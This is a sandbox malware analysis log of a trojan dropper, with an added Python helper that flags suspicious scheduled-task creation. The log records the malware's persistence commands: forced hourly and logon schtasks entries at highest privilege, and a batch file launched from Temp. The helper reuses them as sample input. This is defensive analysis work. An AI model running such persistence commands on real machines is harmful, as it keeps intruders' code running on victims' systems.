Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0027A720 21_2_0027A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56076 22_2_00B56076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56D00 22_2_00B56D00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002FB800 24_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002F4870 24_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00272040 24_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0028A100 24_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002842A0 24_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002722C0 24_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00353B28 24_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0027AB50 24_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_003503A0 24_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002E0380 24_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0034A450 24_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0035956F 24_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_002F1590 24_2_002F1590
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0027A720 24_2_0027A720
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: String function: 003DD590 appears 46 times
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: String function: 0034D590 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
Source: MyProg.exe.4.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: hunta[1].exe, 00000002.00000003.1321581799.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000003.1322295794.0000000005BC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3743392087.0000000005710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe, 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe Binary or memory string: OriginalFilenameAy3Info.exe0 vs hunta[1].exe
Source: hunta[1].exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: WwKLWFk.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WwKLWFk.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WwKLWFk.exe.2.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: hunta[1].exe Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: RageMP131.exe.2.dr Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: MPGPH131.exe.2.dr Static PE information: Section: ZLIB complexity 0.9998547544838146
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@28/31@1/2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 4_2_0021119F
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 22_2_00B5119F
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\RageMP131 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7456
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: hunta[1].exe ReversingLabs: Detection: 94%
Source: hunta[1].exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\hunta[1].exe File read: C:\Users\user\Desktop\hunta[1].exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\hunta[1].exe "C:\Users\user\Desktop\hunta[1].exe"
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" " Jump to behavior
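The two schtasks command lines above are the dropper's persistence mechanism: an hourly task and an ONLOGON task, both forced (/f), both running the copy in C:\ProgramData with /rl HIGHEST. The following is an added triage helper, not part of the Joe Sandbox report, that parses process-creation command lines of this shape and explains why each one is suspicious. The two report command lines are reused verbatim; the benign-looking "Vendor Update" line is constructed for contrast, and the option list, trigger set and scoring rules are the author's own assumptions, not a schtasks specification.

```python
import re

# Options that consume the next token as their value (case-insensitive); everything else is a flag.
_VALUE_OPTS = {"/tn", "/tr", "/sc", "/ru", "/rp", "/rl", "/mo", "/st", "/sd", "/ed",
               "/ri", "/du", "/s", "/u", "/p", "/ec", "/xml"}
# Triggers that re-run the binary without user action; DAILY/WEEKLY are common for legitimate updaters.
_RECURRING_TRIGGERS = {"MINUTE", "HOURLY", "ONLOGON", "ONSTART", "ONIDLE"}
# Directories a standard user can write to; a scheduled task pointing here is rarely a vendor install.
_USER_WRITABLE = re.compile(r"\\(ProgramData|Users\\[^\\]+|Temp|Public)\\", re.IGNORECASE)

# Constructed sample input. The first two lines are the command lines recorded in this report;
# the third is a made-up benign entry, the fourth a non-schtasks line the parser must ignore.
SAMPLE_CMDLINES = [
    r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST',
    r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST',
    r'C:\Windows\System32\schtasks.exe /Create /TN "Vendor Update" /TR "C:\Program Files\Vendor\update.exe" /SC DAILY /ST 03:00',
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "',
]


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping double-quoted arguments as one token."""
    return [quoted if quoted else bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline: str):
    """Return a dict describing a `schtasks /create` invocation, or None for any other command line."""
    toks = tokenize(cmdline)
    if not toks or not toks[0].rsplit("\\", 1)[-1].lower().startswith("schtasks"):
        return None
    opts, flags, i = {}, set(), 1
    while i < len(toks):
        key = toks[i].lower()
        if key in _VALUE_OPTS and i + 1 < len(toks):
            opts[key] = toks[i + 1]
            i += 2
        else:
            flags.add(key)
            i += 1
    if "/create" not in flags:
        return None
    return {
        "name": opts.get("/tn"),
        "action": opts.get("/tr"),
        "trigger": (opts.get("/sc") or "").upper(),
        "run_as": opts.get("/ru"),
        "run_level": (opts.get("/rl") or "LIMITED").upper(),   # schtasks defaults to LIMITED
        "force": "/f" in flags,
    }


def score_task(task: dict) -> list:
    """Human-readable reasons a parsed task looks like malware persistence (empty list = nothing notable)."""
    reasons = []
    if task["run_level"] == "HIGHEST":
        reasons.append("/rl HIGHEST: runs with the highest privileges the account holds")
    if task["trigger"] in _RECURRING_TRIGGERS:
        reasons.append(f"/sc {task['trigger']}: recurring or logon-bound trigger typical of persistence")
    if task["force"]:
        reasons.append("/f: silently replaces an existing task of the same name")
    if task["action"] and _USER_WRITABLE.search(task["action"]):
        reasons.append("/tr points into a user-writable directory rather than Program Files or Windows")
    return reasons


def triage(cmdlines) -> list:
    """Return (task name, action, reasons) for every schtasks /create with at least one finding."""
    hits = []
    for line in cmdlines:
        task = parse_schtasks(line)
        if task is None:
            continue
        reasons = score_task(task)
        if reasons:
            hits.append((task["name"], task["action"], reasons))
    return hits


if __name__ == "__main__":
    for name, action, reasons in triage(SAMPLE_CMDLINES):
        print(f"{name!r} -> {action}")
        for r in reasons:
            print(f"    {r}")
```

Both report tasks trip all four rules, while the constructed DAILY task under Program Files trips none. The same logic can be pointed at Sysmon Event ID 1 or Windows 4698 (task created) events; note that /RU "user" with /rl HIGHEST only elevates if that account is an administrator, so the run level is a signal of intent rather than proof of elevation.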
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
